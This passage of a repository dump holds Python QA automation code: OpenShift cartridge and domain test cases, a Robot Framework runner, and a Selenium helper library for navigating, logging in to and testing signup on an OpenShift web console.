"135b603d3d2cf041cfd01c85ce0b2b327cc5cdbd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5254, "license_type": "no_license", "max_line_length": 136, "num_lines": 134, "path": "/automation/open/testmodules/RT/cartridge/stop_start_app_upon_git_push.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\nimport os,sys,re,time,subprocess\n\nimport proc\nimport OSConf\nimport testcase\nimport common\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"Stop Start appliaction upon git push\"\n try:\n self.test_variant = self.config.test_variant\n except:\n self.info(\"Missing OPENSHIFT_test_name, used `php` as default\")\n self.test_variant = 'php'\n\n self.app_name = self.test_variant.split('-')[0] + \"stopstart\"\n self.git_repo = os.path.abspath(os.curdir)+os.sep+self.app_name\n self.app_type = common.app_types[self.test_variant]\n\n self.steps_list = []\n\n common.env_setup()\n common.clean_up(self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n\n def finalize(self):\n pass\n\nclass StopStartAppUponGitPush(OpenShiftTest):\n\n def test_method(self):\n # 1. Create an app\n self.steps_list.append(testcase.TestCaseStep(\"1. Create an %s app\" % (self.test_variant),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n # 2.Custom git hook\n hook_file_path = \"%s/.openshift/action_hooks/build\" % (self.git_repo)\n key_string = \"sleep 30\"\n testcode = \"\"\"\n#!/bin/bash\nset -x\necho \"%s\"\necho \"Waiting for stop to finish\"\n%s\n\"\"\" %(key_string, key_string)\n cmd = \"echo '%s' >> %s; chmod +x %s\" % (testcode, hook_file_path,hook_file_path)\n self.steps_list.append(testcase.TestCaseStep(\"2.Custom git hook\",\n cmd,\n expect_description=\".openshift/action_hooks/build modified successfully\",\n expect_return=0))\n\n def create_proc(self, cmd):\n self.proc = proc.Proc(cmd)\n\n\n # 3.Git push in a subprocess\n self.steps_list.append(testcase.TestCaseStep(\"3.Git push in a subprocess(No Check)\",\n create_proc,\n function_parameters=[self, \"cd %s && git add . 
&& git commit -am t && git push\" % (self.git_repo),],\n expect_description=\"Git push should be started\"))\n\n # 4.Waiting for stop to finish\n def grep_output(self, t, x, y):\n return self.proc.grep_output(t, x, y)\n\n self.steps_list.append(testcase.TestCaseStep(\"4.Waiting for stop to finish\",\n grep_output,\n function_parameters=[self, r\"Waiting for stop to finish\", 2 ,20],\n expect_description=\"app stop should succeed\",\n expect_return=0))\n\n # 5.Check if the key_string exists in the output\n self.steps_list.append(testcase.TestCaseStep(\"5.Check if the '%s' exists in the output\" % (key_string),\n grep_output,\n function_parameters=[self, key_string, 2, 20],\n expect_description=\"'%s' should be found in the output\" % (key_string),\n expect_return=0))\n\n # 6.Check app is unavailable before git push finish\n test_html = \"Service Temporarily Unavailable\"\n self.steps_list.append(testcase.TestCaseStep(\"6.Check app is unavailable before git push finish\",\n common.grep_web_page,\n function_parameters=[OSConf.get_app_url_X(self.app_name), test_html, \"-H 'Pragma: no-cache'\", 2, 9],\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0))\n\n # 7.Wait for git push to finish\n def wait(self, x, y):\n return self.proc.wait(x,y)\n\n self.steps_list.append(testcase.TestCaseStep(\"7.Wait for git push to finish\",\n wait,\n function_parameters=[self, 5, 10],\n expect_description=\"git push should finish within given time and return 0\",\n expect_return=0))\n\n # 8.Check app is available after git push\n test_html = \"Welcome to OpenShift\"\n self.steps_list.append(testcase.TestCaseStep(\"8.Check app is available after git push\",\n common.grep_web_page,\n function_parameters=[OSConf.get_app_url_X(self.app_name), test_html, \"-H 'Pragma: no-cache'\", 5, 8],\n expect_description=\"'%s' should be found in the web page\" % (test_html),\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(StopStartAppUponGitPush)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6438068747520447, "alphanum_fraction": 0.6438068747520447, "avg_line_length": 25.943395614624023, "blob_id": "1fa6ebe0e30960fde1fb37c415145ae64d4b47c8", "content_id": "59d26a75b2bc16805890c15e3b4817786ea10451", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1429, "license_type": "no_license", "max_line_length": 77, "num_lines": 53, "path": "/automation/get_run_tests.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import os\n\nfrom robot.conf import RobotSettings\nfrom robot.running import TestSuite\nfrom robot import run_cli\n\n\ndef get_available_test_suites(source):\n settings = RobotSettings()\n suite = TestSuite([os.path.abspath(source)], settings)\n return list(get_test_suites(suite))\n\ndef get_tests(suite):\n for s in suite.suites:\n for t in get_tests(s):\n yield t\n for t in suite.tests:\n yield t\n\ndef get_test_suites(suite):\n 
for s in suite.suites:\n for test_suite in get_test_suites(s):\n yield test_suite\n if suite.tests:\n yield suite\n\ndef write_argument_file(tests):\n with open('the_args.txt', 'w') as out:\n for t in tests:\n case_name = t.longname.replace(' ', '')\n out.write('--test %s\\n' % case_name)\n\ndef get_available_tests(source):\n settings = RobotSettings()\n suite = TestSuite([os.path.abspath(source)], settings)\n return list(get_tests(suite))\n\ndef execute_runner_script(source):\n #print runner, '--argumentfile the_args.txt'\n run_cli(['--argumentfile', 'the_args.txt', source]) \n\ndef execute(source):\n ava_tests = get_available_tests(source)\n write_argument_file(ava_tests)\n execute_runner_script(source)\n\n\nif __name__ == '__main__':\n source = os.path.join(os.path.dirname(__file__), 'WebDemo', 'xgao_tests')\n test_suites = get_available_tests(source)\n print test_suites\n\n execute(source)\n\n" }, { "alpha_fraction": 0.6350184679031372, "alphanum_fraction": 0.6418002247810364, "avg_line_length": 33.88172149658203, "blob_id": "a41b10807520fe77cf733ce990c140cde727cd96", "content_id": "3a92a9ce38d4812d4c155244d00ec928c8a61158", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3244, "license_type": "no_license", "max_line_length": 210, "num_lines": 93, "path": "/automation/open/testmodules/RT/node/app_creation_without_domain.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\n\"\"\"\nAttila Nagy\[email protected]\nMay 9, 2012\n\n[US1876] App creation should fail without domain\n\"\"\"\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\nimport re\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.app_name = common.getRandomString(10)\n self.current_domain = common.get_domain_name()\n try:\n self.app_type = self.config.test_variant\n except:\n self.app_type = 'php'\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n common.create_domain(common.getRandomString(10), self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n\nclass AppCreationWithoutDomain(OpenShiftTest):\n def test_method(self):\n\n if self.current_domain is not None and self.current_domain != '':\n try:\n common.command_get_status(\"rhc domain delete %s -l %s -p '%s' %s\" % ( self.current_domain, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS))\n except:\n return self.failed(\"Unable to destroy domain.\")\n else:\n self.info(\"Domain doesn't exist, no need to destroy it.\")\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Trying to create an application without an existing domain\",\n common.create_app,\n function_parameters = [ self.app_name, common.app_types[self.app_type], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, False ],\n expect_description = \"Operation must fail\",\n expect_return = \"!0\"\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Creating a domain name\",\n common.create_domain,\n function_parameters = [ common.getRandomString(10), self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd ],\n expect_description = \"Domain must be created successfully\",\n expect_return = 0,\n expect_string_list = [ \"You may now create an application\" ]\n ))\n \n 
self.steps_list.append(testcase.TestCaseStep(\n            \"Creating an application\",\n            common.create_app,\n            function_parameters = [ self.app_name, common.app_types[self.app_type], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, False ],\n            expect_description = \"The application must be created successfully\",\n            expect_return = 0\n        ))\n\n        case=testcase.TestCase(\"[US1876] App creation should fail without domain\",self.steps_list)\n        case.run()\n        if case.testcase_status == 'PASSED':\n            return self.passed(\"%s passed\" % self.__class__.__name__)\n        if case.testcase_status == 'FAILED':\n            return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(AppCreationWithoutDomain)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n" }, { "alpha_fraction": 0.7070434093475342, "alphanum_fraction": 0.7130818963050842, "avg_line_length": 38.67441940307617, "blob_id": "65b8c262fc2f47005893369146a7101c102deb46", "content_id": "682385b4112d5eab2724d0728d0f56fc5309aeb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22191, "license_type": "no_license", "max_line_length": 122, "num_lines": 559, "path": "/automation/open/lib/baseutils.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\nfrom selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0\nimport unittest, time, re\nimport logging\nimport config\nimport ConfigParser\n\n\n\n\nlogging.basicConfig(filename='seleniumtest.log',format='%(levelname)s:%(message)s',level=logging.DEBUG)\n#url=\"https://stg.openshift.redhat.com/\"\n#logging.info('So should this')\n#logging.warning('And this, too')\n\ndef initiate(classself):\n\ttmp_browser=config.browser.strip().lower()\n\tif tmp_browser == 'firefox':\n\t\tif config.proxy == False:\n\t\t\tclassself.driver = webdriver.Firefox()\n\t\t\tif config.browserpath != '0':\n\t\t\t\t classself.binary = FirefoxBinary(config.browserpath)\n\t\t\t\t classself.driver = webdriver.Firefox(classself.binary)\n\t\telif config.proxy == True:\n\t\t\tclassself.profile=webdriver.FirefoxProfile()\n\t\t\tclassself.profile.set_preference(\"network.proxy.type\", 1)\n\t\t\tclassself.profile.set_preference(\"network.proxy.http\", \"file.sjc.redhat.com\")\n\t\t\tclassself.profile.set_preference(\"network.proxy.http_port\", 3128)\n\t\t\tclassself.profile.set_preference(\"network.proxy.ssl\", \"file.sjc.redhat.com\")\n\t\t\tclassself.profile.set_preference(\"network.proxy.ssl_port\", 3128)\n\t\t\tclassself.driver = webdriver.Firefox(classself.profile)\n\t\t\tif config.browserpath !='0':\n\t\t\t\t classself.binary = FirefoxBinary(config.browserpath)\n\t\t\t\t classself.driver = webdriver.Firefox(classself.profile,classself.binary)\n\telif tmp_browser == 'ie':\n\t\tclassself.driver = webdriver.Ie()\n\telif tmp_browser == 'chrome':\n\t\tclassself.driver = webdriver.Chrome()\n\telse :\n\t    logging.warning(tmp_browser+' is not supported')\n\t \n\tif config.browserpath != '0' and tmp_browser == 'chrome':\n\t\tclassself.driver = webdriver.Chrome(executable_path=config.browserpath)\n\tclassself.driver.implicitly_wait(20)\n\tclassself.base_url = config.url\n\tclassself.verificationErrors = []\n#\tbasedriver=classself.driver\n\n\ndef is_element_present(classself, how, what):\n    try: classself.driver.find_element(by=how, value=what)\n    except NoSuchElementException, e: return False\n    return True\n\ndef assert_contain_text_by_id(classself,text,id_name):\n    _retry=120\n    while(_retry>0):\n        _retry=_retry-1\n        time.sleep(1)\n        try:\n           # if classself.driver.find_element_by_id(id_name).text.find(text) != -1 : break\n            if text in classself.driver.find_element_by_id(id_name).text : break\n        except: pass\n        time.sleep(1)\n    else:classself.fail(\"the text is not displayed yet\")\n\ndef assert_contain_text_by_css(classself,text,css_name):\n    _retry=120\n    while(_retry>0):\n        _retry=_retry-1\n        time.sleep(1)\n        try:\n#            if classself.driver.find_element_by_css_selector(css_name).text.find(text) != -1 : break\n            if text in classself.driver.find_element_by_css_selector(css_name).text : break\n        except: pass\n        time.sleep(1)\n    else:classself.fail(\"the text is not displayed yet\")\n\ndef assert_contain_text_by_xpath(classself,text,xpath):\n    _retry=60\n    while(_retry>0):\n        _retry=_retry-1\n        time.sleep(1)\n        try:\n           # if classself.driver.find_element_by_xpath(xpath).text.find(text) != -1 : break\n            if text in classself.driver.find_element_by_xpath(xpath).text : break\n        except: pass\n        time.sleep(1)\n    else:classself.fail(\"the text is not displayed yet\")\n\n\ndef is_element_displayed(classself,how,what):\n    try:classself.assert_true(classself.driver.find_element(by=how,value=what).is_displayed(),what+\" is not displayed\")\n    except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef is_element_hidden(classself,how,what):\n    try:classself.assert_false(classself.driver.find_element(by=how,value=what).is_displayed())\n    except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef wait_element_not_displayed_by_id(classself,id_name):\n    try:\n        WebDriverWait(classself.driver,120).until(classself.driver.find_element_by_id(id_name))\n        classself.assert_true(classself.driver.find_element_by_id(id_name).is_displayed())\n    except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef is_text_displayed(classself,text,css):\n    try:\n        WebDriverWait(classself.driver, 100).until(classself.driver.find_element_by_css_selector(css))\n        classself.assert_true( text == classself.driver.find_element_by_css_selector(css).text)\n    except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef is_text_displayed_by_id(classself,text,id_name):\n    try:\n        WebDriverWait(classself.driver, 100).until(classself.driver.find_element_by_id(id_name))\n        classself.assert_true( text == classself.driver.find_element_by_id(id_name).text)\n    except AssertionError as e: classself.verificationErrors.append(str(e))\n\n\n\ndef check_title(classself,title):\n    time.sleep(5)\n    for i in range(60):\n        try:\n            if title == classself.driver.title: break\n        except: pass\n        time.sleep(1)\n    else:classself.fail(\"time out,%s is not equal %s\" %(title,classself.driver.title))\n\n\ndef assert_element_present_by_css(classself,css):\n\ttry: classself.assert_true(is_element_present(classself,By.CSS_SELECTOR,css))\n\texcept AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_not_present_by_css(classself,css):\n    try: classself.assert_false(is_element_present(classself,By.CSS_SELECTOR,css))\n    except AssertionError as e: 
classself.verificationErrors.append(str(e))\n\ndef assert_element_present_by_id(classself,idname):\n\ttry: classself.assert_true(is_element_present(classself,By.ID,idname))\n\texcept AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_not_present_by_id(classself,idname):\n try: classself.assert_false(is_element_present(classself,By.ID,idname))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_present_by_xpath(classself,xpath):\n\ttry: classself.assert_true(is_element_present(classself,By.XPATH,xpath))\n\texcept AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_present_by_link_text(classself,link_text):\n try: classself.assert_true(is_element_present(classself,By.LINK_TEXT,link_text))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_present_by_partial_link_text(classself,partial_link_text):\n try: classself.assert_true(is_element_present(classself,By.PARTIAL_LINK_TEXT ,partial_link_text))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\n\ndef assert_element_present_by_name(classself,name):\n try: classself.assert_true(is_element_present(classself,By.NAME ,name))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_present_by_class_name(classself,class_name):\n try: classself.assert_true(is_element_present(classself,By.CLASS_NAME ,class_name))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_present_by_tag_name(classself,tag_name):\n try: classself.assert_true(is_element_present(classself,By.TAG_NAME ,tag_name))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\n\ndef assert_element_present(classself,how,what):\n try: classself.assert_true(is_element_present(classself,how ,what))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_text_equal_by_css(classself,text,css,msg=None):\n try: classself.assertEqual(text,classself.driver.find_element_by_css_selector(css).text)\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\n\ndef assert_text_equal_by_xpath(classself,text,xpath):\n try: classself.assertEqual(text,classself.driver.find_element_by_xpath(xpath).text)\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_text_equal_by_partial_link_text(classself,text,partial_link_text):\n try: classself.assertEqual(text,classself.driver.find_element_by_partial_link_text(partial_link_text).text)\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\n\ndef assert_text_equal_by_id(classself,text,id_name):\n try: classself.assertEqual(text,classself.driver.find_element_by_id(id_name).text)\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_text_regexp_match_by_css(classself,text,css):\n try: classself.assertRegexpMatches(classself.driver.find_element_by_css_selector(css).text,text)\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_value_equal_by_id(classself,value,id_name):\n try: classself.assertEqual(value,classself.driver.find_element_by_id(id_name).get_attribute(\"value\"))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef is_text_equal_by_css(classself,text,css):\n for i in range(60):\n try:\n if text == classself.driver.find_element_by_css_selector(css).text: break\n except: 
pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not equal to %s\" %(text,classself.driver.find_element_by_css_selector(css).text))\n\ndef is_text_equal_by_xpath(classself,text,xpath):\n for i in range(60):\n try:\n if text == classself.driver.find_element_by_xpath(xpath).text: break\n except: pass\n time.sleep(1)\n else:classself.fail(\"time out,%s is not equal to %s\" %(text,classself.driver.find_element_by_xpath(xpath).text))\n\n\n\n \n\n# for i in range(240):\n# try:\n# if not classself.driver.find_element_by_id(id_name).is_displayed(): break\n# except: pass\n# time.sleep(1)\n# else: classself.fail(\"time out\")\n\n#def wait_element_not_displayed_by_id(classself,id_name):\n # wait_element_not_present(classself,By.ID,id_name)\n \n\ndef wait_element_present_by_xpath(classself,xpath):\n for i in range(60):\n try:\n if is_element_present(classself,By.XPATH, xpath): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not present\"%(xpath))\n\ndef wait_element_not_present_by_xpath(classself,xpath):\n for i in range(60):\n try:\n if not is_element_present(classself,By.XPATH, xpath): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is present\"%(xpath))\n\ndef wait_element_present_by_css(classself,css):\n for i in range(60):\n try:\n if is_element_present(classself,By.CSS_SELECTOR, css): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not present\"%(css))\n\ndef wait_element_present_by_id(classself,idname):\n for i in range(60):\n try:\n if is_element_present(classself,By.ID, idname): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not present\"%(idname))\n\ndef wait_element_present_by_class(classself,class_name):\n for i in range(60):\n try:\n if is_element_present(classself,By.CLASS_NAME,class_name): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not present\"%(class_name))\n\ndef wait_element_present_by_name(classself,name):\n for i in range(60):\n try:\n if is_element_present(classself,By.NAME,name): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not present\"%(name))\n\ndef wait_element_present_by_link_text(classself,name):\n for i in range(60):\n try:\n if is_element_present(classself,By.LINK_TEXT,name): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not present\"%(name))\n\n\ndef click_element_by_css(classself,css):\n wait_element_present_by_css(classself,css)\n classself.driver.find_element_by_css_selector(css).click()\n\ndef click_element_by_id(classself,id_name):\n wait_element_present_by_id(classself,id_name)\n classself.driver.find_element_by_id(id_name).click()\n\ndef click_element_by_xpath(classself,xpath):\n wait_element_present_by_xpath(classself,xpath)\n classself.driver.find_element_by_xpath(xpath).click()\n\ndef click_element_by_xpath_wait(classself,xpath):\n wait_element_present_by_xpath(classself,xpath)\n classself.driver.find_element_by_xpath(xpath).click()\n time.sleep(8)\n\ndef click_element_by_link_text(classself,link_text):\n wait_element_present_by_link_text(classself,link_text)\n classself.driver.find_element_by_link_text(link_text).click()\n \n\ndef click_element_by_class(classself,class_name):\n wait_element_present_by_class(classself,class_name)\n classself.driver.find_element_by_class_name(class_name).click()\n\n\ndef click_element_by_css_no_wait(classself,css):\n classself.driver.find_element_by_css_selector(css).click()\n\ndef 
click_element_by_id_no_wait(classself,id_name):\n classself.driver.find_element_by_id(id_name).click()\n\ndef click_element_by_xpath_no_wait(classself,xpath):\n classself.driver.find_element_by_xpath(xpath).click()\n\ndef click_element_by_partial_link_text_no_wait(classself,partial_link_text):\n classself.driver.find_element_by_partial_link_text(partial_link_text).click()\n\ndef go_to_home(classself):\n# basedriver=classself.driver\n classself.driver.get(classself.base_url+\"/app/\")\n# time.sleep(10)\n check_title(classself,\"OpenShift by Red Hat\")\n \n\ndef go_to_express(classself):\n express_page=classself.base_url+\"/app/express\"\n classself.driver.get(express_page)\n '''\n# go_to_home(classself)\n click_element_by_xpath(classself,\"//a[contains(text(),'Cloud Services')]\")\n '''\n check_title(classself,\"OpenShift by Red Hat | Express\")\n\ndef go_to_express_quick_start(classself):\n quick_start=classself.base_url+\"/app/express#quickstart\"\n classself.driver.get(quick_start)\n\n\ndef go_to_flex(classself):\n# go_to_home(classself)\n flex_page=classself.base_url+\"/app/flex\"\n classself.driver.get(flex_page)\n '''\n click_element_by_xpath(classself,\"//a[contains(text(),'Cloud Services')]\")\n check_title(classself,\"OpenShift by Red Hat | Express\")\n scroll_bar(classself)\n click_element_by_xpath(classself,\"//a[contains(text(),'Flex')]\")\n '''\n check_title(classself,\"OpenShift by Red Hat | Flex\")\n\n\ndef go_to_power(classself):\n# go_to_home(classself)\n power_page=classself.base_url+\"/app/power\"\n classself.driver.get(power_page)\n '''\n click_element_by_xpath(classself,\"//a[contains(text(),'Cloud Services')]\")\n check_title(classself,\"OpenShift by Red Hat | Express\")\n scroll_bar(classself)\n click_element_by_xpath(classself,\"//a[contains(text(),'Power')]\")\n '''\n check_title(classself,\"OpenShift by Red Hat | Power\")\n\ndef go_to_signin(classself):\n #click_element_by_class(classself,\"sign_in\")\n # time.sleep(5)\n click_element_by_link_text(classself,\"Sign in\")\n #is_element_displayed(classself,By.ID,\"login-form\")\n is_element_displayed(classself,By.ID,\"login_input\")\n\n\ndef go_to_signup(classself):\n # scroll_bar(classself)\n #signup_page=classself.base_url+\"/app/user/new/express\"\n go_to_home(classself)\n scroll_to_bottom(classself)\n click_element_by_xpath(classself,\".//*[@id='bottom_signup']/div/a\")\n time.sleep(2)\n if not is_element_displayed(classself,By.ID,\"signup\"):\n click_element_by_xpath(classself,\".//*[@id='bottom_signup']/div/a\")\n #click_element_by_link_text(classself,\"Sign up and try it\")\n #click_element_by_xpath(classself,\".//*[@id='opener']/div/a\")\n# click_element_by_css(classself,\"a.button.sign_up\")\n is_element_displayed(classself,By.ID,\"signup\")\n\n\n\ndef go_to_express_console(classself):\n# basedriver=classself.driver\n classself.driver.get(classself.base_url+\"/app/dashboard\")\n# time.sleep(10)\n #check_title(classself,\"OpenShift by Red Hat\")\n\n\ndef go_to_partners(classself):\n partner_page=classself.base_url+\"/app/partners\"\n classself.driver.get(partner_page)\n check_title(classself,\"OpenShift by Red Hat | Meet Our Partners\")\n\ndef go_to_legal(classself):\n legal_page=classself.base_url+\"/app/legal\"\n classself.driver.get(legal_page)\n check_title(classself,\"OpenShift by Red Hat | Terms and Conditions\")\n classself.driver.execute_script(\"window.scrollTo(0, 0);\")\n\n\ndef go_to_platformoverview(classself):\n go_to_home(classself)\n click_element_by_link_text(classself,\"Platform Overview\")\n 
check_title(classself,\"OpenShift by Red Hat | Cloud Platform\")\n \ndef go_back(classself):\n classself.driver.back()\n time.sleep(5)\n\ndef input_by_id(classself,id_name,input_content):\n classself.driver.find_element_by_id(id_name).clear()\n classself.driver.find_element_by_id(id_name).send_keys(input_content)\n\n\ndef input_by_name(classself,name,input_content):\n classself.driver.find_element_by_name(name).clear()\n classself.driver.find_element_by_name(name).send_keys(input_content)\n\ndef input_by_xpath(classself,xpath,input_content):\n classself.driver.find_element_by_xpath(xpath).clear()\n classself.driver.find_element_by_xpath(xpath).send_keys(input_content)\n\n\ndef set_captcha(classself):\n classself.driver.execute_script(\"\"\"\n var input_ele = window.document.createElement('input');\n input_ele.setAttribute('type','hidden');\n input_ele.setAttribute('name','captcha_secret');\n input_ele.setAttribute('value','zvw5LiixMB0I4mjk06aR');\n var dialog = window.document.getElementById('signup');\n dialog.getElementsByTagName('form')[0].appendChild(input_ele);\"\"\"\n )\n\n\n\ndef register_a_user(classself,username,password,confirmpassword=\"0\",captcha=False):\n if confirmpassword == \"0\":\n confirmpassword =password\n #wait_element_present_by_id(classself,\"web_user_email_address\")\n input_by_id(classself,\"web_user_email_address\",username)\n input_by_id(classself,\"web_user_password\",password)\n input_by_id(classself,\"web_user_password_confirmation\",confirmpassword)\n if captcha:\n set_captcha(classself)\n classself.driver.find_element_by_id(\"web_user_submit\").click()\n \n\ndef login(classself,username,password):\n wait_element_present_by_id(classself,\"login_input\")\n input_by_id(classself,\"login_input\",username)\n input_by_id(classself,\"pwd_input\",password)\n classself.driver.find_element_by_css_selector(\"input.button\").click()\n time.sleep(5)\n\ndef login_by_form(classself,username,password):\n wait_element_present_by_xpath(classself,\"//div[@id='login-form']/form/label/input\")\n input_by_xpath(classself,\"//div[@id='login-form']/form/label/input\",username)\n input_by_xpath(classself,\"//div[@id='login-form']/form/label[2]/input\",password)\n classself.driver.find_element_by_css_selector(\"input.button\").click()\n time.sleep(5)\n\ndef login_by_window(classself,username,password):\n wait_element_present_by_xpath(classself,\"//div[@id='login-form']/form/label/input\")\n input_by_xpath(classself,\"//div[@id='login-form']/form/label/input\",username)\n input_by_xpath(classself,\"//div[@id='login-form']/form/label[2]/input\",password)\n classself.driver.find_element_by_css_selector(\"form > input.button\").click()\n time.sleep(5)\n\ndef reset_password(classself,user):\n go_to_home(classself)\n go_to_signin(classself)\n click_element_by_xpath(classself,\"//*[@id='lost_password']/p/a\")\n# click_element_by_css(classself,\"a.password_reset.more\")\n time.sleep(2)\n assert_text_equal_by_css(classself,\"Reset your password\",\"#reset_password > header > h1\")\n input_by_id(classself,\"email_input\",user)\n click_element_by_css_no_wait(classself,\"#password-reset-form > form > input.button\")\n \ndef change_password(classself,user,oldpwd,oldpwd2,newpwd,newpwdcfm):\n go_to_home(classself)\n time.sleep(4)\n go_to_signin(classself)\n login(classself,user,oldpwd)\n go_to_express_console(classself)\n scroll_bar(classself)\n try:click_element_by_link_text(classself,\"Click here to change your password\")\n except:click_element_by_css(classself,\"a.change_password\")\n 
time.sleep(3)\n    assert_text_equal_by_css(classself,\"Change your password\",\"#change_password > header > h1\")\n    input_by_name(classself,\"old_password\",oldpwd2)\n    input_by_id(classself,\"password\",newpwd)\n    input_by_name(classself,\"password_confirmation\",newpwdcfm)\n    click_element_by_css(classself,\"#change-password-form > form > input.button\")\n    time.sleep(1)\n    if classself.driver.current_url not in [classself.base_url+\"/app/dashboard\",classself.base_url+\"/app/control_panel\"]:\n        classself.fail(\"fail, it went to the wrong location\")\n    \n\ndef scroll_bar(classself):\n    classself.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n    time.sleep(5)\n    classself.driver.execute_script(\"window.scrollTo(0, 0);\")\n    time.sleep(10)\n\ndef scroll_by(classself):\n    classself.driver.execute_script(\"window.scrollBy(-100,-100);\")\n\ndef scroll_to_upper(classself):\n    classself.driver.execute_script(\"window.scrollTo(0, 0);\")\n\ndef scroll_to_middle(classself):\n    classself.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight/2);\")\n\n\ndef scroll_to_bottom(classself):\n    classself.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\ndef generate_greetings(username):\n    _greetings=\"Greetings, \" + username \n    _greetings+=\"!\"\n    return _greetings\n\ndef logout(classself):\n    assert_element_present_by_link_text(classself,\"Sign out\")\n    click_element_by_link_text(classself,\"Sign out\")\n    assert_element_present_by_link_text(classself,\"Sign in\")\n\n\ndef wait_for_ajax(classself,timeout = 10):\n    time.sleep(timeout)\n    #WebDriverWait(classself.driver, timeout).until(lambda driver: driver.execute_script(\"return jQuery.active == 0;\"))\n\ndef update_config_file(section,name,value):\n    configparse= ConfigParser.RawConfigParser()\n    configparse.read('config.cfg')\n    configparse.set(section,name,value)\n    with open('config.cfg', 'wb') as configfile:\n        configparse.write(configfile)\n\n\n\n\n\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.5656092166900635, "alphanum_fraction": 0.5728190541267395, "avg_line_length": 32.02381134033203, "blob_id": "6b5dafe6855f356673f575fe633189d48223f7ee", "content_id": "da4ea7a9eea5afd136824479eaa31c0eccb0b7b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2778, "license_type": "no_license", "max_line_length": 79, "num_lines": 84, "path": "/depot/depotapp/tests.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#coding: utf8\n\n\"\"\"\nThis file demonstrates writing tests using the unittest module. 
